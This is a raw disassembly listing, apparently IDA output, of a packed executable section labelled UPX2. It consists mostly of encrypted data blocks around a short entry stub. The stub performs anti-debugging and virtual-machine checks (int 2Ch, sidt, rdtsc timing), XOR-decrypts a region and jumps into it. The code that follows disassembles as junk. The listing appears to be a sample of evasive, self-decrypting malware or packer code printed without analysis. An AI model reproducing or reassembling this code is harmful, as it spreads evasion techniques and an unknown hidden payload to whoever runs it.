dd 778C8202h, 0D2AFCD3Bh, 6A3DC822h, 0E5286FA4h, 0E055EA5Ah
dd 0AFA7DCFFh, 0D063C45Fh, 521A0758h, 0FFFD78F8h, 58DE55F7h
dd 0D6D958E3h, 0CE212DEFh, 9836286Eh, 6BA79713h, 0C991085Ah
dd 0A0BD204Dh, 766D8236h, 0AE79CD5Bh, 0C0CCC802h, 7013BC8Fh
dd 200EA8EEh, 53F9480Ch, 0A800E29Ah, 0F06FF838h, 0E24897F0h
dd 934BC82Ah, 4B6B77Ah, 0F027BEF7h, 22C9ADD7h, 5D8E98DCh
dd 40614A5Ah, 0F2B7ED25h, 721CE806h, 6FEB58EEh, 1017A667h
dd 8F6FBB60h, 0E5D02CC1h, 5019183Ch, 82BD3D55h, 0A5B0F808h
dd 0A0AD56ECh, 1FD42077h, 809CF6E6h, 808231D0h, 5375387Ch
dd 81209B65h, 443B594Ah, 0EC0A87D9h, 0DF2DF8B4h, 80A51EF1h
dd 0FC94DD2h, 7072A2C4h, 692C9BAEh, 40116C99h, 9190D98Ah
dd 3F2FE790h, 35623866h, 101BE65Ah, 47688C7h, 0F0E7BDE3h
dd 222DAD97h, 6800989Ch, 40317A11h, 47A733E3h, 30346C53h
dd 907B5844h, 3EFBD92h, 604750A5h, 0E3179B8Eh, 0A7C2EF3Dh
dd 4424018Bh, 880FE89Ah, 0A07D41C9h, 13D7933Fh, 904920A7h
dd 0F3158B90h, 97C4DF3Fh, 0AC26118Dh, 83111898h, 0B634CF47h
dd 0ADD80B4Fh, 27544077h, 0D0CADCD1h, 58F65349h, 0DA24786Dh
dd 3E7A6F83h, 439CFCB3h, 42EEF4C2h, 9C16E3C6h, 13DF9A1Fh
dd 0C4B45840h, 29504738h, 0E52EE9FDh, 0D093DA3Ch, 64A58379h
dd 3F9F4B38h, 20CD5014h, 5FB09B04h, 0BD24C399h, 700779A8h
dd 0D35A23B2h, 31CFB475h, 0BA5D8E58h, 10E3FAEFh, 0D46154ACh
dd 6485E498h, 0F519743Fh, 7B4E5BB8h, 38B015BFh, 0DB179869h
dd 12925BA7h, 83BA7708h, 0AB521789h, 0D94C65E7h, 84868B1Ch
dd 8F08C7E6h, 0B526FF13h, 4B5717D2h, 0FDBE77F5h, 29CBB2Fh
dd 5F0DECE9h, 40B627ABh, 8FB61C91h, 0F98BDB4h, 880E1B61h
dd 2FBC6621h, 0BA59180Fh, 58E08714h, 0DF721677h, 6E17DCCBh
dd 0D25A37CDh, 70D72E48h, 1F26400Eh, 505BE783h, 9D2188EAh
dd 49C15D9h, 5A1468D6h, 746BD837h, 35527A5Dh, 0F057FA68h
dd 697A11Ah, 8A6EA66Dh, 43728D55h, 0EE7478C8h, 46B3EB0Ah
dd 0D58B6325h, 39A4D1Dh, 33403880h, 0E005A8F8h, 9616175Ch
dd 360188C9h, 3F6DA47Bh, 0A0DED422h, 18085314h, 2019E8BFh
dd 5EA3B750h, 5D95285Dh, 0F023B8ECh, 43D28C35h, 3B5478A8h
dd 204DE8DEh, 78EA4E67h, 0FFD6277Ah, 322BB563h, 2E06A8DEh
dd 503379BFh, 0C0A5E929h, 0CFB163F0h, 0DA3F6779h, 932BD8F7h
dd 90DB88C7h, 0B28CB8D0h, 703FA336h, 0D4905987h, 45BAC829h
dd 0FA36B08Bh, 0A0A861E6h, 939B4826h, 0B1C498h, 21773940h
dd 1F031646h, 0D2C628E3h, 71C198B3h, 0B39AC8D8h, 0CA9D785Fh
dd 48C226F4h, 24915C3Ah, 75184756h, 0A2C127CCh, 45F27A5Fh
dd 4021317Eh, 35689D83h, 201DD152h, 917B5844h, 851EEAC6h
dd 704701A4h, 0E0C5A88Dh, 0F5B21489h, 0C0B1B1EEh, 0CBF00727h
dd 2DFC62ADh, 10FBE130h, 88594822h, 0F0C7BEF8h, 665D71FEh
dd 88A3986Ch, 0BFF75E32h, 0CCFAF2B7h, 0A6EDF88Fh, 0A92772A0h
dd 8541C882h, 7027017Ch, 6552488Ch, 50032158h, 0C0818842h
dd 8D6FF1CDh, 0A04D5158h, 0E70EAC95h, 9000CC87h, 0F0A7B870h
dd 0E00E5CD6h, 0C0BAE4F1h, 0F0850DBAh, 8922C5A8h, 54C8E886h
dd 0EE86D8A3h, 5A9D84Bh, 0F5E0A694h, 0E09591CAh, 40F318BCh
dd 7DE1815Eh, 30DFC1E4h, 23B41F04h, 0E91CD1h, 26F148E2h
dd 187847A2h, 9F0AD5FDh, 0D061E9C4h, 3C4C839Ah, 0B33F684Ah
dd 30EF68EBh, 6C40B0E4h, 848637ADh, 70F73A91h, 0A21D1DA5h
dd 0E58188Ch, 289F8B36h, 0CF500524h, 0A226EAE9h, 5A0AD854h
dd 80F928E6h, 0A29933D0h, 74AF2BC8h, 2753E20Fh, 50888CFFh
dd 0B01F78E8h, 0A9999D76h, 80B99079h, 90DC4532h, 0FBD72899h
dd 0F055C083h, 717EB7Ch, 0C02BEC53h, 303A7558h, 53FD78D6h
dd 0F36B6991h, 777DBBA0h, 0E07E3C95h, 60B5287Eh, 7EA797CCh
dd 0BF91085Ah, 611750BBh, 0AB9217DBh, 8099E031h, 0F9B4D12h
dd 70B7A004h, 989023EEh, 0DB93081Eh, 8A809880h, 306F981Ch
dd 0A8974346h, 0D978DA67h, 0BBAD3A81h, 0E037D07Dh, 818A35Eh
dd 0A20388DCh, 644D836Ch, 0A0B7DD2Bh, 0A34DE806h, 90BB3023h
dd 7AA2C8F2h, 78DD3968h, 17825FCDh, 12FF9DB7h, 451688BAh
dd 305FC19Ch, 0A0BD68C6h, 8DCDA80h, 0A9953A61h, 34B231E0h
dd 0EB75387Ch, 0E0E2B0DFh, 79D58DEDh, 0B0FF7898h, 2259E8F6h
dd 78CA4093h, 0FFF634F9h, 737BD319h, 92CE80DDh, 0A3054910h
dd 4D98D72Eh, 2016684Dh, 6820E166h, 0E30BC896h, 8F2717E6h
dd 776A2A81h, 6055295Fh, 0E9410DB6h, 464408EAh, 0E6E7AA01h
dd 0A96BFAE2h, 0B793BF14h, 5A163768h, 735B72ABh, 6532B8C4h
dd 50232178h, 0E0A1886Ah, 450AB955h, 64F0E155h, 13EBC8F6h
dd 904920A7h, 98603B90h, 603528FEh, 598BDB47h, 40115B5Dh
dd 0F0FA8F48h, 21EDF889h, 0E45B5824h, 88A0F95h, 0D09798A0h
dd 0D9212D99h, 501318CCh, 0C7F5984Ah, 0C7B410EAh, 2B0797D9h
dd 891C19h, 93CAB02h, 0FD4C903Bh, 22D5A555h, 0D260985Ch
dd 0B7A0B51h, 34DA8F00h, 23CDF8AFh, 0E43B5804h, 0C82C4366h
dd 731728A2h, 0F0C718C3h, 0FC761BBCh, 0C1619868h, 20857390h
dd 0E241ED8Dh, 5A92D864h, 91A3BEAh, 0B286B01Ah, 3896ABAEh
dd 54E6132Ch, 28D118D8h, 0B03F5198h, 79A5AA77h, 1A4B1BE5h
dd 10B04AC7h, 0F472CFC0h, 0E065B817h, 24F3189Ch, 0A8CC8B0Ch
dd 86AFE868h, 24989FE6h, 108BC86Dh, 0F5F94AC2h, 7A14624h
dd 70ECAC1Bh, 0D443980Ch, 0CAB77D7Ah, 0A026FB5Dh, 0A4081F56h
dd 90FB48FDh, 7569C872h, 72D0B2ABh, 364702CCh, 5958EF9Eh
dd 2138F60h, 0D259FAF2h, 0C42F5B31h, 9F0FFABFh, 3D5A10A0h
dd 0F057FA4Ch, 0DF31277Eh, 2FDC6716h, 50D370EFh, 26A87C8h
dd 0DF6DF808h, 80992C11h, 26DC3712h, 0FDB728BEh, 0F067C863h
dd 3806955Ch, 91019888h, 0CF6F926Ah, 0B09F3413h, 0B6DE2714h
dd 7FB958BCh, 0E065E445h, 4600D75Eh, 5D0388F2h, 5030408Fh
dd 0E86A87A8h, 764DF854h, 0AE19CD7Bh, 0A5AAC8E2h, 70877A3Ch
dd 0E0ED6BCEh, 0D73183Ch, 2D6089C0h, 305FC097h, 61B298DEh
dd 3E5871h, 4359CD62h, 0F87053h, 0E0F0E931h, 13E388B9h
dd 6A511827h, 0D6A30D88h, 2C099477h, 83EE2908h, 0FFCD20B2h
dd 7502C7BFh, 1F1F1D46h, 0AF81F0E3h, 0EEA07775h, 6657D507h
dd 85257A52h, 700BD8D4h, 7F86EDAAh, 7BDECD4Fh, 0ED650C5Ah
dd 0C082D039h, 486183FAh, 0B6A5F90Eh, 76289BD4h, 6F7B582Ch
dd 6A2D43B2h, 8F076A20h, 0F0FB5A1Bh, 58F79BFCh, 0FFFDB6EBh
dd 337AA4E7h, 4879AEC5h, 0EF1422D6h, 7FA637CAh, 4804D96Fh
dd 6035288Ah, 0FF1B2987h, 0A81108DAh, 0B07F7855h, 98EDC874h
dd 905B5814h, 0C9D87Ah
dd 7013FA00h, 0E0A42DD6h, 5010F0DCh, 0EC43884Ah, 14BB75B8h
dd 2373A52Ah, 9B7D86Ch, 8039A062h, 0A42CB870h, 0EB4818FAh
dd 0B66E1956h, 0A8F11883h, 4FA098CFh, 20C92AF7h, 93395E05h
dd 0B5B4CF77h, 0EBA4D63Dh, 1DD4E8h, 0FF8B8300h, 1C39068h
dd 0FFC48BEDh, 0E85B93D0h, 59h, 824648Bh, 4EBB8h, 64FAEB00h
dd 18A167h, 0F30408Bh, 830240B6h, 3C7500F8h, 0E8h, 0ED815D00h
dd 402334h, 237B858Bh, 85030040h, 402383h, 858BF08Bh, 40237Fh
dd 23838503h, 8B500040h, 0ACC933FEh, 238B8532h, 41AA0040h
dd 23878D3Bh, 0EF7C0040h, 64C02BC3h, 896430FFh, 5678B820h
dd 3871234h, 6000h, 7BB0h, 31420000h, 1E00h, 78h, 22Ch dup(0)
dd 7FFDF000h, 134Ch dup(0)
; =============== S U B R O U T I N E =======================================
public start
start proc near
cld
call loc_3143202E
start endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_31432006 proc near ; CODE XREF: UPX2:3143207D�p
push ebx
loc_31432007: ; CODE XREF: UPX2:3143201D�j
mov ecx, 0DA5h
mov ebx, edx
loc_3143200E: ; CODE XREF: sub_31432006+13�j
xor [eax], dx
lea eax, [eax+2]
xchg dl, dh
lea edx, [ebx+edx]
loop loc_3143200E
pop ebx
retn
sub_31432006 endp
; ---------------------------------------------------------------------------
jmp short loc_31432007
; ---------------------------------------------------------------------------
loc_3143201F: ; CODE XREF: UPX2:31432068�j
pop ebp
retn
; ---------------------------------------------------------------------------
loc_31432021: ; CODE XREF: UPX2:31432036�j
; UPX2:31432047�j
push ebp
mov eax, 8000h
xor ecx, ecx
jmp short loc_31432055
; =============== S U B R O U T I N E =======================================
sub_3143202B proc near ; CODE XREF: UPX2:3143204A�p
; UPX2:31432050�p
rdtsc
retn
sub_3143202B endp
; ---------------------------------------------------------------------------
loc_3143202E: ; CODE XREF: start+1�p
test eax, eax
jnz short loc_3143203A
int 2Ch ; Internal routine for MSDOS (IRET)
test eax, eax
jns short loc_31432021
jmp short loc_31432049
; ---------------------------------------------------------------------------
loc_3143203A: ; CODE XREF: UPX2:31432030�j
push eax
sidt fword ptr [esp-2]
pop eax
mov eax, [eax+6]
shl eax, 10h
jns short loc_31432021
loc_31432049: ; CODE XREF: UPX2:31432038�j
push ebp
call sub_3143202B
xchg eax, ecx
call sub_3143202B ; CODE XREF: UPX2:314320C5�j
loc_31432055: ; CODE XREF: UPX2:31432029�j
sub eax, ecx
mov ebp, [esp+4]
sub dword ptr [esp+4], 9E06h
sub eax, 100h
jnb short loc_3143201F
sub ebp, 301006h
lea eax, [ebp+301082h]
mov dx, [eax-65h]
call sub_31432006
add al, ch
pop eax
mov [ebx-6CB4D94Ch], bl
pusha
test [ebx+1D74E501h], al
popa
dec esp
sub esp, [ebp-818F31Ch]
loop loc_314320A7
cmp al, [eax-0Bh]
mov [ebx+ecx*8], dl
xchg eax, edx
; ---------------------------------------------------------------------------
db 0F0h
db 0FEh, 67h, 44h
; ---------------------------------------------------------------------------
loc_314320A7: ; CODE XREF: UPX2:3143209A�j
xlat
or eax, 3B42B95Fh
dec edx
add eax, 0A56F42F7h
fcmovnb st, st(5)
mov eax, ds:0E2F3C8ECh
mov [edx-68h], esp
xor edi, [eax+ecx+1D6C1C0h]
pop ds
db 36h
jbe short near ptr loc_31432050+1
retn 0AB6Dh
; ---------------------------------------------------------------------------
db 0D3h
dd 0AC56B9E3h, 74378A39h, 0CC79E999h, 1F213BDEh, 86904D0Ah
dd 0B2BABF91h, 0F5EFC0F4h, 9D7286F7h, 0CB93A50Ah, 2632FBA8h
dd 0E9E0EA01h, 0CF82D6D4h, 0F4E1CBCDh, 0B0C0839h, 6A3D1324h
dd 8898F0DBh, 0E1D4D229h, 0B5B8C124h, 0E6E0E2A0h, 3C281007h
dd 54582D26h, 0D3F74E1Ch, 0F2167579h, 8F47C4F4h, 483989Ch
dd 0BDD363ACh, 79D4BFBEh, 0D72A81EBh, 1056E8D7h, 0A74739B4h
dd 0DDF8908Fh, 4C7F711Bh, 5C86BB37h, 0F3F73C1Eh, 0D24B455Dh
dd 0CC9FB482h, 7D0E0D40h, 0CA465C6Ah, 2730E99Bh, 595A8902h
dd 8DC3E8C0h, 7B2A2160h, 0D76BB056h, 3E39BC75h, 8E4C2825h
dd 0D2F3CA44h, 0ACCFCECDh, 1F71A3CBh, 5E525B68h, 2076FC46h
dd 133B92E3h, 5F54F2C1h, 0AE81D3F7h, 27069D72h, 56697B5Fh
dd 7B8BD41h, 3F012639h, 56DAF501h, 0A6A9BE69h, 1069D51Ah
dd 26926525h, 2A252A39h, 0DE188B84h, 9DA5E2D0h, 0F7A1B6D4h
dd 0E07588h, 0C0496E70h, 5E993DF0h, 7BF10607h, 0D0C56F5Ah
dd 7B12AE9Bh, 686597C6h, 3CACD753h, 9D151A37h, 0D4F9006Eh
dd 471922CFh, 0AC7C2641h, 680E85FCh, 0B9618D78h, 38168E8Ah
dd 577407F3h, 0A0E4413Bh, 0D39BDB65h, 595B7307h, 0CDBABB43h
dd 8303283Ch, 1453CB2Fh, 0AA523BB0h, 16E99393h, 38530D67h
dd 0A4263F3Bh, 0F6FA0F67h, 2A5B1CE2h, 1AA2879Dh, 0A8F2844Ah
dd 2D4A5F5Ch, 1B766332h, 84F20306h, 0CE2E1AD9h, 0C69BC5FAh
dd 6B6E82E9h, 0DFD7A855h, 7A161B02h, 0E6E8FEF7h, 915C472Eh
dd 8B79A695h, 8B657A79h, 36394CE7h, 0E954224Bh, 21EA9FFFh
dd 8298A05Ch, 4579769Dh, 7659CCF2h, 21304575h, 206949Dh
dd 0D6D104EDh, 0FEE5C0C1h, 7E33D8D1h, 7E4EFD96h, 93AA3C0Dh
dd 0F9CB07AFh, 70422DD7h, 0A19394C1h, 9DE4813Dh, 494B62A4h
dd 31B689B7h, 0FFF30838h, 0C4C5855Fh, 0E51E3BAFh, 936FB4AFh
dd 0C5CC5927h, 14270712h, 0C3D3427Eh, 4341D3E3h, 179DA7A7h
dd 64667941h, 14ABCAC4h, 7CF12313h, 666479F6h, 35B5FAE0h
dd 0B8A21822h, 5CA28D73h, 2BB64947h, 8F051A19h, 0E8F46C6Ah
dd 0ADDC3EC3h, 0AB0D1018h, 0E9D5695Bh, 281816B2h, 0FBFCEEECh
dd 0CE2C62E9h, 2E2FB9BAh, 7748A10Bh, 3AB37881h, 85A5BA37h
dd 73F43921h, 0F6E34760h, 9A634EB1h, 0B5F78A85h, 0AA445958h
dd 16182CCBh, 0C513BC8Ch, 724BD5E4h, 4862A9C2h, 0E66C0D83h
dd 795652B1h, 6747DC27h, 6CFB92F8h, 85A25B79h, 899719A0h
dd 59D27474h, 0CECCB605h, 88AC7AE3h, 0D9DAA2F4h, 6C8C3C4h
dd 2A86D015h, 33FA8F5Eh, 0A2D1DDEBh, 94FE79C0h, 0D0D287B3h
dd 0A4CC7730h, 78104B04h, 4C4E630Bh, 71625D3Fh, 0A3F86159h
dd 0EB434A21h, 18C6B382h, 3B1AC742h, 0C8465B3Ah, 9C1A45FAh
dd 80EA69CEh, 0ECC0BDD5h, 0C6FEABC3h, 0C6A7F1Dh, 0C5540251h
dd 8387D875h, 0BDE5CAD5h, 0B9464B94h, 8A8C9F25h, 5ED4FB75h
dd 8B357A59h, 6091608h, 7F2F1E7Ah, 0BEB02844h, 70999A9h
dd 5668796Bh, 0BFA1A1BEh, 0FE300C47h, 934116BBh, 4EA88D91h
dd 7A7C9187h, 253F0A29h, 5074494Ch, 99917B64h, 9FA98685h
dd 0F8D5D9D5h, 8E2489C9h, 756384C9h, 0C499B830h, 0BCF0352Fh
dd 0AAE4B383h, 10D5254h, 0ED6CB153h, 3350A93h, 461643B1h
dd 8E3377ADh, 0A95382CEh, 0DF8FA4A3h, 2063C12h, 46672B3Eh
dd 64625676h, 0DCBB9496h, 6D273891h, 0F86ABB0h, 0E0C39ABh
dd 0D3791513h, 302E6E82h, 0C41169EBh, 653C41E8h, 167DA2B8h
dd 0AF530C67h, 14093FAEh, 0F6D1B70Fh, 0E05AE2E2h, 0BBAD3F57h
dd 0E68ADDDEh, 4779720Fh, 0BE9EC401h, 0EEC12AEBh, 3D928ED9h
dd 0A6B5FB38h, 1EAD0781h, 0C0C21009h, 0EDFB582Dh, 8CE0D989h
dd 4596BBD1h, 0BEBCE830h, 16A4FC79h, 0C3D0DE91h, 390C2125h
dd 0EE3C653Ch, 9E5E4DF0h, 0AEF29CADh, 4ABBB1F0h, 7A7F4445h
dd 52524E49h, 4329B8BDh, 0AA9A943Ch, 0A275310h, 76269866h
dd 0CBA3B435h, 11FA3F3Dh, 32311E88h, 6C3748EBh, 9E76BBA7h
dd 618EDEF8h, 4A1E3335h, 0DB3F92F7h, 5139DBEBh, 98AA8462h
dd 93946D6Ah, 404257A8h, 274C2B2Bh, 0B9B8AF36h, 0BCBCBA82h
dd 541AA6A3h, 680F2A2Ah, 0FB6B8AC4h, 587B4775h, 1F001DF7h
dd 21393634h, 88B888D3h, 0C0D2021h, 1BE1D0B8h, 0C087192Bh
dd 275C2FCFh, 0ACF3989Bh, 807FB4C3h, 545378C9h, 28273C3Eh
dd 0FBFB1013h, 0CFCFE4E6h, 5CF0EEEBh, 475C551Bh, 0E712CB62h
dd 0E46AF4B2h, 0AE30E6E8h, 0A3B4BD9Fh, 0FFF6D1FFh, 40DCBE1h
dd 31373B3Ch, 75727F71h, 9B825675h, 0D1BFA1A0h, 0F2E1DCDBh
dd 967081Dh, 55492423h, 4E0F4A41h, 9583928Ah, 0D9DF8DA9h
dd 0CA8ADEC5h, 293F1606h, 5D5B012Dh, 75675679h, 0BEB78780h
dd 0DFEEC285h, 0E4F5F7FDh, 363A183Ch, 685A4D25h, 998F5114h
dd 82B49286h, 0D0CAD7DEh, 0A11DAEAh, 4C290306h, 41444474h
dd 9BA16F7Fh, 0A3A8BBACh, 0FEEFF1B2h, 3B14F2E7h, 2B293535h
dd 2469424Bh, 8B835130h, 0D1A9A5A5h, 0EAD0AADDh, 0E3D0A14h
dd 5E5C3723h, 7A746125h, 878890BFh, 0C4CCB98Ch, 0FEF9C3C8h
dd 5E210610h, 74402C0Eh, 556D7174h, 0DABE8A98h, 0E8DBA182h
dd 0D6E6F4F0h, 56320104h, 675F2506h, 918A707Ah, 0BDBAAE8Dh
dd 0C8C6F2D9h, 3E7BD1F5h, 22021001h, 444F4D5Ch, 90996D44h
dd 0C88A85B3h, 0CFEBD1F4h, 1507FBFEh, 362E1836h, 776F534Ah
dd 0EBAE7D71h, 0EBB7BD91h, 0D5E7C1CFh, 290EEC17h, 7A5A3933h
dd 7B766F26h, 938B9EAEh, 0DFCEAE9Eh, 0EEC9A3E3h, 2D072102h
dd 5D592239h, 736F581Eh, 0A8AF97A4h, 0EADFA9AFh, 0C485DBE2h
dd 380F1A0Bh, 4E40372Eh, 9067785Fh, 0A7B48798h, 0E6C7D1D7h
dd 0F18D592h, 2B3F0F31h, 67564D55h, 959C7C67h, 0B3BF8D95h
dd 0F1CDF1B5h, 3319EBEBh, 25263231h, 7B727E31h, 8F984A61h
dd 0B8B7BBAAh, 0F4D4AEEDh, 0C04D4F0h, 7B271923h, 11704641h
dd 8B8D8DB3h, 0DCD0B896h, 0FDE0C4E9h, 20031711h, 5048024Ch
dd 667E714Eh, 0AEAC9197h, 0DEC198C8h, 0F6F4F9FFh, 301D4243h
dd 2D5B3736h, 626C6A48h, 0E6A59889h, 0D1CFF1F2h, 182C93E0h
dd 38140309h, 76265E50h, 91BC7B75h, 0B88F868Fh, 0C2CBC5C3h
dd 713FFFEh, 2D195F1Eh, 70777547h, 869D5762h, 0B1A3AFB4h
dd 0E3FFFCAEh, 0E02EAC4h, 5A2F3E02h, 767A782Ah, 0B2E98E9Bh
dd 0CBDCBFBCh, 0F8F4CFF0h, 0A231C35h, 61392B22h, 7E79504Bh
dd 0B3A19997h, 0B3D7A6A6h, 0F3E1EFC9h, 37353717h, 5B7E4523h
dd 766E7D5Bh, 0A587989Dh, 0C7C2B6ABh, 0C1AF3F3h, 3638073Eh
dd 53693C50h, 9B9E6251h, 0A7898191h, 0ECA3DDD5h, 1305CFF9h
dd 1A2E1400h, 7B7C5B47h, 0BFF37B7Ah, 0A0B59FA8h, 0C9FEC4D1h
dd 80CEBF6h, 39062B2Bh, 5663622Ch, 9C8A6572h, 0DFDA87B6h
dd 0FEFCC1D3h, 2913327Bh, 516D202Eh, 6A405346h, 948192A4h
dd 0B4D8A4A2h, 0F8C5EBD1h, 35181D16h, 7E32222Bh, 6176546Fh
dd 0B7ABBE81h, 0DFDEA7A0h, 0E5EAF9C3h, 201B6A05h, 464C4E70h
dd 8F9E7740h, 0CFBF898Fh, 0D1F5CEF4h, 141CFAE1h, 39243416h
dd 73404342h, 9D986F47h, 88C9A7AFh, 0FFE8E3C5h, 1722FFF7h
dd 2F202E2Ah, 797F4064h, 9D8C6F73h, 0BDAFB9BDh, 0E3C2DEE6h
dd 330C0A15h, 4C492039h, 685C4A45h, 98969695h, 0D9CC9FCCh
dd 0EAE5CFF5h, 0E05111Bh, 5F5D3B3Ch, 4467497Bh, 8AB2839Eh
dd 0C3C6B6B0h, 0D2D498FFh, 34233F2Dh, 595E3432h, 93937714h
dd 0BFA08D94h, 0D0C2D7D8h
dd 1614F38Fh, 382C010Dh, 54465F37h, 87846363h, 0A6A599BCh
dd 0E99FD1DFh, 6F05EBE3h, 27293929h, 7474432Eh, 0EA9B6169h
dd 0DBB7B69Ch, 0E6F2C2DBh, 1504EC3Eh, 545E1C34h, 0E764441h
dd 879295B0h, 0C2DFA1BFh, 0C9FAC6E6h, 3B0C191Ah, 56533F2Ah
dd 726B6B4Eh, 0B494F294h, 0C0C3A3B1h, 0F2CAEEFCh, 56180008h
dd 4F592C08h, 8A647867h, 0BCB09AA6h, 0E7C5CCE8h, 0E13DB91h
dd 2B3F1400h, 4340684Dh, 99904869h, 8D8CE285h, 0D4F1F7E2h
dd 355BB8BBh, 17491210h, 755E5555h, 0A794756Bh, 92C5A3B2h
dd 0E4D6C9CEh, 0D26EC1Ah, 7D39132Ah, 77707827h, 968D88AAh
dd 0D4DD87B6h, 0F4D5C0D6h, 5367936h, 405D1E2Ch, 7D604049h
dd 9DA7B196h, 0B55A4BC7h, 0ECD654B0h, 0B05B706Fh, 2F0B08CEh
dd 569187Dh, 0BE85BBBAh, 0F86634BAh, 282E4718h, 203270Dh
dd 0B9B3C468h, 74FA3F23h, 5E31EF26h, 9F929B13h, 0B07E4F09h
dd 0EECFD209h, 281E0327h, 0EE9857F9h, 5739D5B3h, 96AA83E4h
dd 0EE614304h, 3E4257C5h, 72424379h, 3262FEFDh, 7636D2BBh
dd 8EF9E6CFh, 8656A79h, 36531C4Fh, 0A6D7649h, 8FE09FF5h
dd 274B999Ah, 86B8B110h, 0CFA3282Eh, 2E006E88h, 5E70E69Ch
dd 0C3576166h, 0A648C0F1h, 6E7F0118h, 83506859h, 0F4D86F6Ah
dd 0D586959Ah, 4242E4D4h, 0A1A3A380h, 8A88D864h, 0D8CEEB9Fh
dd 901F0418h, 0F0E88D87h, 3B8434DBh, 1D104F50h, 6C5FA802h
dd 5BCFD7DAh, 26FF2C2Bh, 63150000h, 8C925656h, 0E45222A7h
dd 0FDE9F670h, 0D03A4F54h, 0F3F1DC3Eh, 23BE317Ch, 0B4B5229Eh
dd 9D49E9Fh, 6C47F49Eh, 0BDF87547h, 3425FA9Eh, 898CBCEFh
dd 0FDFD9192h, 0AC810068h, 50D3695Bh, 0E5BDC21Bh, 0A6FC2138h
dd 9AD0E124h, 0A3A4B952h, 9AF9D08Eh, 4B7C7BD7h, 8AADCA5Ch
dd 0F2C4138Ah, 0E6058F8Dh, 9AB6B195h, 87C4106h, 5882DC9Eh
dd 36D52D1Dh, 0F32484C6h, 0BDE4D5E4h, 52C9A982h, 64027C16h
dd 4AC362AFh, 8805DA20h, 89138C38h, 0B5B7CCC7h, 8AD0702Bh
dd 0E8D24824h, 310352ACh, 40BA697h, 5351EFF0h, 0ADAEC2CCh
dd 4AA96F9Bh, 0A69DE00Ch, 2C5E5EE6h, 170BF153h, 0DF156425h
dd 0F77230ECh, 2C2A4304h, 1E1F2309h, 0B5DDC85Dh, 0F3C62796h
dd 4CC61B5Dh, 0ABB2BA27h, 0ECA5AC86h, 44815CB0h, 17F22F44h
dd 29ED548Bh, 923542BCh, 1693AB99h, 0A6597775h, 0B324E313h
dd 3E3ED0B0h, 6F070DF9h, 4813AF8Fh, 496CD768h, 5E619E20h
dd 0B3684A49h, 361268F0h, 21417AF1h, 2DB0F5E9h, 828CBDE5h
dd 56E1E962h, 0C6AD4141h, 0FE00171Dh, 0D3D081BDh, 3357BDBDh
dd 7A4CBDB8h, 0CADD99EEh, 22253D1Dh, 0F5925D0Dh, 0C9CCE508h
dd 0C9F2E3B4h, 0E48BDE88h, 45787179h, 8E91F803h, 0ECF00400h
dd 0C2AE8886h, 0FC99C7FAh, 286C817Fh, 0CDD5AA01h, 8614190Ch
dd 0BF930A7Eh, 0BCD3849Fh, 0DB8FA4A2h, 4047CC88h, 0CB374C49h
dd 3827F98Ah, 1C5BAAF3h, 0A451D1B3h, 0EE5210CBh, 0F0B3D6Fh
dd 59BBBC15h, 5902273Bh, 4A02A6Eh, 653C41E9h, 0F17DA2B8h
dd 7032230h, 0A97D7E51h, 0F7F80A98h, 0BFE49E2h, 6CF8A6DCh
dd 2325DA21h, 17190E0Eh, 0E288CD60h, 6FF1362Dh, 0C2C7D21Dh
dd 0B2ED51ADh, 0A3F87D89h, 6D416679h, 3EDCBFD6h, 24B5FDCDh
dd 843CD1D5h, 0C891D0AFh, 7718F4F2h, 2FDB4D7Dh, 1A0CB4ACh
dd 0FDCF4C5h, 3661379Fh, 790F935Dh, 555B7071h, 2E2FB4C1h
dd 383D9819h, 5690FB98h, 2EA5BFFFh, 7E7E9374h, 277259E9h
dd 18A77DCCh, 0BEB44641h, 245C191h, 0EEA3F17Eh, 1F2745A7h
dd 1A1C0E60h, 31DFA6CBh, 0CBAB0738h, 7B43D41Ah, 719AAFAFh
dd 6C6E8332h, 121269D6h, 91197D62h, 0E8E9FE5Ah, 10B51450h
dd 149EAB9Bh, 64657AE2h, 0CB4C6E73h, 3371E8Fh, 0E0E07972h
dd 94B964CBh, 0B5A8BDBFh, 28391652h, 0C9C3A32h, 85786C3Bh
dd 0B0F71391h, 0DDDEB4B7h, 0F07CEA16h, 217C4751h, 0D760FA57h
dd 41CA1F13h, 0CFCFC3F6h, 5CF15A4Dh, 475BE51Bh, 1B8B5362h
dd 0F74F6466h, 0F2F30803h, 0A8B0B399h, 0FEFADFDDh, 0BFFA7B85h
dd 0C7436875h, 252158EDh, 126E89C8h, 0ECBFE4F8h, 9190A8C0h
dd 33362DF8h, 0ECAEAF00h, 800F1408h, 0D1F9876Dh, 7C859BCCh
dd 0DBDACEF4h, 0C8A12225h, 31026B49h, 0FA221F9Bh, 0E9F22365h
dd 2D6E3AC4h, 0B194F915h, 96AC6B6Ch, 2D0D62CBh, 0FCFD12FCh
dd 3D50BBE7h, 0A495A7C6h, 483A3304h, 0F9C66253h, 2011067Ch
dd 7E7EF108h, 0C7F9EE99h, 1E161741h, 6F41B6C5h, 737ACFD1h
dd 921A2E1Eh, 0EADD3235h, 36A9D45Ch, 6D95AABAh, 564517E8h
dd 66F4B951h, 67674361h, 0B2B89C9Ah, 0DFCBB4A5h, 0C7E0C0C2h
dd 2C0F1810h, 0E0074930h, 0F05AD296h, 3B58A228h, 0ADEFAEC6h
dd 0E8D1CF60h, 0EDE2E175h, 932B705Ch, 0FDFF1402h, 2F9EEC65h
dd 0C3584343h, 347F1D3Bh, 4D4F6464h, 66AE935Eh, 10C5A708h
dd 2A608673h, 0AF0A3948h, 2473B8B7h, 0BB155A31h, 2837A9BAh
dd 0CF9B8F03h, 0A7075BDEh, 16986C2Fh, 676B81DBh, 1B575438h
dd 59132827h, 7619F090h, 0B78AE36Fh, 82FD29h, 0C2EB6738h
dd 33067B7Dh, 37319297h, 385CF2C2h, 0A04E36C6h, 83EFC9CBh
dd 0E2A66804h, 2B1D7271h, 0D34483E9h, 2C85EADAh, 97998D0Bh
dd 0B6E86D92h, 1751564Dh, 2CB6FABFh, 0F6F85A8Ah, 0F14C84E1h
dd 92D5ECF8h, 1FE075DAh, 0AF496E71h, 1A1D3370h, 0ED39B888h
dd 76CADAD8h, 0E114B0E2h, 6D059DB1h, 6A415655h, 3D34BFD7h
dd 0B2BEFDCCh, 9255442Fh, 0CE1BA594h, 0EAA77A44h, 0E63B351Ch
dd 822C53ABh, 0E952ECBEh, 0B21E99FBh, 84FF1D5Fh, 2B3E2315h
dd 0DFCD4130h, 28AEF341h, 0A75DCFE0h, 5AA9E6E4h, 7262C11Fh
